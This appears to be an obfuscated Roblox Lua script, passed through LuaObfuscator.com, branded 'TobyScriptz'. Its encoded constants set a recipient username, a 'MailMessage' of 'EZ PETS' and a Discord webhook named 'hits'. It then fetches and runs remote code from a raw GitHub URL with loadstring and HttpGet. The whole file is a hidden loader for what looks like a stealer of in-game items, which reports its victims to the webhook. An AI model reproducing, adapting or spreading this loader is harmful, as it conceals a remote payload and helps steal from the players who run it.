    --[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=v2(v0(v30,16));if v19 then local v89=0;local v90;while true do if (v89==1) then return v90;end if (v89==0) then v90=v5(v83,v19);v19=nil;v89=1;end end else return v83;end end end);local function v20(v31,v32,v33)if v33 then local v84=(v31/(2^(v32-(2 -1))))%((570 -(367 + 201))^(((v33-(2 -1)) -(v32-(1 -0))) + 1 + 0)) ;return v84-(v84%(2 -1)) ;else local v85=(621 -((1620 -(68 + 997)) + 64))^(v32-(1638 -(1523 + 114))) ;return (((v31%(v85 + v85))>=v85) and ((1271 -(226 + 1044)) + 0)) or (0 -0) ;end end local function v21()local v34=0 -0 ;local v35;while true do if (v34==(958 -((1242 -(87 + 263)) + 65))) then return v35;end if (v34==(117 -(32 + 85))) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=1 -0 ;end end end local function v22()local v36=180 -(67 + 113) ;local v37;local v38;while true do if (v36==(1 + (952 -(802 + 150)))) then return (v38 * (628 -372)) + v37 ;end if (v36==0) then v37,v38=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 2 ;v36=3 -2 ;end end end local function v23()local v39=0 -0 ;local v40;local v41;local v42;local v43;while true do if (v39==0) then v40,v41,v42,v43=v1(v16,v18,v18 + 3 );v18=v18 + (6 -(2 -0)) ;v39=1;end if (v39==(1 + 0)) then return (v43 * (16778213 -((2102 -(1069 + 118)) + 82))) + (v42 * (185570 -120034)) + (v41 * (150 + 106)) + v40 ;end end end local function v24()local v44=v23();local v45=v23();local v46=2 -1 ;local v47=(v20(v45,(1139 -(116 + 1022)) -0 ,(16 -12) + 16 ) * ((2 + 0)^(56 -24))) + v44 ;local v48=v20(v45,21 + (0 -0) ,822 -(368 + 423) );local v49=((v20(v45,100 -68 )==1) and  -(19 -(10 + 8))) or (3 -(7 -5)) ;if (v48==((1301 -(814 + 45)) -(416 + 26))) then if (v47==0) then return v49 * (0 -(0 -0)) ;else local v91=0 + 0 ;while true do if (v91==(0 -(0 + 0))) then v48=1;v46=438 -(145 + 293) ;break;end end end elseif (v48==(2477 -(44 + 386))) then return ((v47==(1486 -(998 + 488))) and (v49 * ((1 + 0)/(0 + 0 + 0)))) or (v49 * NaN) ;end return v8(v49,v48-(1908 -(261 + 624)) ) * (v46 + (v47/(2^(824 -(201 + 571))))) ;end local function v25(v50)local v51=1747 -((1815 -(87 + 968)) + 775 + 212) ;local v52;local v53;while true do if (v51==((4 -3) -0)) then v52=v3(v16,v18,(v18 + v50) -(1081 -(926 + 94 + (135 -75))) );v18=v18 + v50 ;v51=1425 -(630 + 793) ;end if ((9 -6)==v51) then return v6(v53);end if (v51==(0 -0)) then v52=nil;if  not v50 then v50=v23();if (v50==(0 + 0)) then return "";end end v51=1 + 0 ;end if (v51==(5 -3)) then v53={};for v92=3 -2 , #v52 do v53[v92]=v2(v1(v3(v52,v92,v92)));end v51=9 -6 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v54=0 -0 ;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v54~=0) then else v55=74 -(71 + 3) ;v56=nil;v54=167 -(122 + 44) ;end if (v54==(2 -0)) then v59=nil;v60=nil;v54=3 + 0 ;end if (v54==(3 -2)) then v57=nil;v58=nil;v54=2 + 0 ;end if (v54~=(7 -4)) then else v61=nil;while true do local v94=0;while true do if (0==v94) then local v99=0 -0 ;while true do if (v99~=(66 -(30 + 35))) then else v94=1;break;end if (v99==(241 -(187 + 54))) then if (v55~=0) then else local v177=0;local v178;while true do if (v177==(1257 -(1043 + 214))) then v178=780 -(162 + 618) ;while true do if (v178==(1 + 0)) then v58={};v59={v56,v57,nil,v58};v178=2 -0 ;end if (2==v178) then v55=581 -(361 + 219) ;break;end if (v178==(0 + 0)) then local v193=320 -(53 + 267) ;while true do if (v193~=(1 + 0)) then else v178=1;break;end if (0==v193) then v56={};v57={};v193=414 -(15 + 398) ;end end end end break;end end end if (v55~=1) then else local v179=0;while true do if (v179==(1638 -(1373 + 263))) then v55=1002 -(451 + 549) ;break;end if (v179~=(982 -(18 + 964))) then else local v187=0 + 0 ;while true do if (v187~=(1 -0)) then else v179=1;break;end if (v187==(0 + 0)) then v60=v23();v61={};v187=1 -0 ;end end end if (v179==1) then local v188=1384 -(746 + 638) ;while true do if (v188~=0) then else for v195=1 + 0 ,v60 do local v196=0 -0 ;local v197;local v198;local v199;while true do if (v196~=1) then else v199=nil;while true do if (v197~=(342 -(218 + 123))) then else if (v198==(1582 -(1535 + 46))) then v199=v21()~=0 ;elseif (v198==(2 + 0)) then v199=v24();elseif (v198==3) then v199=v25();end v61[v195]=v199;break;end if (v197==(0 + 0)) then local v209=0 + 0 ;while true do if (v209~=(561 -(306 + 254))) then else v197=1;break;end if ((738 -(542 + 196))~=v209) then else local v214=0 + 0 ;while true do if (0~=v214) then else v198=v21();v199=nil;v214=1;end if ((1 -0)~=v214) then else v209=1468 -(899 + 568) ;break;end end end end end end break;end if (v196==0) then v197=0 + 0 ;v198=nil;v196=1 + 0 ;end end end v59[7 -4 ]=v21();v188=1;end if (v188==1) then v179=4 -2 ;break;end end end end end v99=604 -(268 + 335) ;end end end if (1==v94) then if ((292 -(60 + 230))==v55) then for v110=573 -(426 + 146) ,v23() do local v111=0;local v112;local v113;local v114;while true do if (v111==0) then v112=0 + 0 ;v113=nil;v111=406 -(118 + 287) ;end if ((1457 -(282 + 1174))==v111) then v114=nil;while true do if (v112~=(811 -(569 + 242))) then else local v191=0 -0 ;local v192;while true do if (v191==(0 -0)) then v192=0 + 0 ;while true do if ((1025 -(706 + 318))==v192) then v112=1252 -(721 + 530) ;break;end if ((1271 -(945 + 326))~=v192) then else v113=0 -0 ;v114=nil;v192=1;end end break;end end end if (v112~=(1 + 0)) then else while true do if (v113==0) then v114=v21();if (v20(v114,1,1 + 0 )~=(700 -(271 + 429))) then else local v200=0;local v201;local v202;local v203;while true do if (v200==3) then if (v20(v202,3,3 + 0 )==1) then v203[4]=v61[v203[4]];end v56[v110]=v203;break;end if ((1 -0)~=v200) then else v203={v22(),v22(),nil,nil};if (v201==(1500 -(1408 + 92))) then local v212=0;while true do if (v212~=(0 + 0)) then else v203[1089 -(461 + 625) ]=v22();v203[1292 -(993 + 295) ]=v22();break;end end elseif (v201==(1 + 0)) then v203[2 + 1 ]=v23();elseif (v201==(1173 -(418 + 753))) then v203[2 + 1 ]=v23() -((4 -2)^(2 + 14)) ;elseif (v201~=(6 -3)) then else local v220=0;local v221;while true do if (v220==0) then v221=0 + 0 ;while true do if (v221==0) then v203[1 + 2 ]=v23() -((1 + 1)^16) ;v203[533 -(406 + 123) ]=v22();break;end end break;end end end v200=1771 -(1749 + 20) ;end if (v200~=(1 + 1)) then else local v205=0 + 0 ;local v206;while true do if (v205~=0) then else v206=1322 -(1249 + 73) ;while true do if ((0 + 0)~=v206) then else local v219=0 + 0 ;while true do if (v219~=(1145 -(466 + 679))) then else if (v20(v202,1203 -(373 + 829) ,1)~=(732 -(476 + 255))) then else v203[1132 -(369 + 761) ]=v61[v203[2 + 0 ]];end if (v20(v202,4 -2 ,2 -0 )~=(2 -1)) then else v203[1903 -(106 + 1794) ]=v61[v203[1 + 2 ]];end v219=1 + 0 ;end if (v219==(337 -(144 + 192))) then v206=217 -(42 + 174) ;break;end end end if ((1 + 0)==v206) then v200=8 -5 ;break;end end break;end end end if (0~=v200) then else local v207=0;while true do if (v207==0) then local v213=0;while true do if (v213==(0 -0)) then v201=v20(v114,2 + 0 ,117 -(4 + 110) );v202=v20(v114,588 -(57 + 527) ,1433 -(41 + 1386) );v213=104 -(17 + 86) ;end if (v213==(1 + 0)) then v207=1;break;end end end if (v207~=(1 -0)) then else v200=1;break;end end end end end break;end end break;end end break;end end end for v115=2 -1 ,v23() do v57[v115-1 ]=v28();end return v59;end break;end end end break;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=4) then if (v81<=1) then if (v81>0) then v78[v80[2]]=v64[v80[3]];else local v102=0;local v103;while true do if (0==v102) then v103=v80[2];v78[v103]=v78[v103](v13(v78,v103 + 1 ,v73));break;end end end elseif (v81<=2) then local v104=0;while true do if (v104==5) then v64[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v104=6;end if (v104==8) then v78[v80[2]]=v64[v80[3]];v72=v72 + 1 ;v80=v68[v72];v104=9;end if (v104==3) then v64[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v104=4;end if (v104==7) then v78[v80[2]][v80[3]]=v80[4];v72=v72 + 1 ;v80=v68[v72];v104=8;end if (v104==6) then v78[v80[2]]=v64[v80[3]];v72=v72 + 1 ;v80=v68[v72];v104=7;end if (v104==9) then v78[v80[2]][v80[3]]=v80[4];break;end if (v104==4) then v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v104=5;end if (v104==2) then v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v104=3;end if (v104==0) then v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v104=1;end if (v104==1) then v64[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v104=2;end end elseif (v81==3) then v78[v80[2]]=v80[3];else local v119=0;local v120;local v121;while true do if (v119==1) then v78[v120 + 1 ]=v121;v78[v120]=v121[v80[4]];break;end if (v119==0) then v120=v80[2];v121=v78[v80[3]];v119=1;end end end elseif (v81<=7) then if (v81<=5) then local v105=0;local v106;local v107;local v108;local v109;while true do if (v105==1) then v73=(v108 + v106) -1 ;v109=0;v105=2;end if (v105==0) then v106=v80[2];v107,v108=v71(v78[v106](v13(v78,v106 + 1 ,v80[3])));v105=1;end if (v105==2) then for v180=v106,v73 do local v181=0;while true do if (v181==0) then v109=v109 + 1 ;v78[v180]=v107[v109];break;end end end break;end end elseif (v81==6) then v64[v80[3]]=v78[v80[2]];else local v124;local v125,v126;local v127;local v128;v78[v80[2]][v80[3]]=v80[4];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v64[v80[3]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v64[v80[3]];v72=v72 + 1 ;v80=v68[v72];v128=v80[2];v127=v78[v80[3]];v78[v128 + 1 ]=v127;v78[v128]=v127[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v128=v80[2];v125,v126=v71(v78[v128](v13(v78,v128 + 1 ,v80[3])));v73=(v126 + v128) -1 ;v124=0;for v174=v128,v73 do v124=v124 + 1 ;v78[v174]=v125[v124];end v72=v72 + 1 ;v80=v68[v72];v128=v80[2];v78[v128]=v78[v128](v13(v78,v128 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];do return;end end elseif (v81<=8) then v78[v80[2]]();elseif (v81==9) then v78[v80[2]][v80[3]]=v80[4];else do return;end end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!103O0003083O00557365724E616D6503073O005430627931333903073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3133373430363831373834393331393437362F6F4F55482O4E716B716268644B49454342794F6E67624C487A534277456D674E4650733443536674427978494B616A4551673951695268474A2D36504A2D6C466453637A03093O00557365724E616D653203023O005F47030B3O004D61696C4D652O7361676503073O00455A2050455453030C3O004C6F6164696E675469746C65030B3O00546F62795363726970747A030B3O00576562682O6F6B4E616D6503043O0068697473030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F69642O6B2F6D61696E2F692O643O6B3200143O0012023O00023O00124O00013O00124O00043O00124O00033O00124O00023O00124O00053O00124O00063O00304O0007000800124O00063O00304O0009000A0012013O00063O0030073O000B000C00124O000D3O00122O0001000E3O00202O00010001000F00122O000300106O000100039O0000026O000100016O00017O00",v9(),...);
    
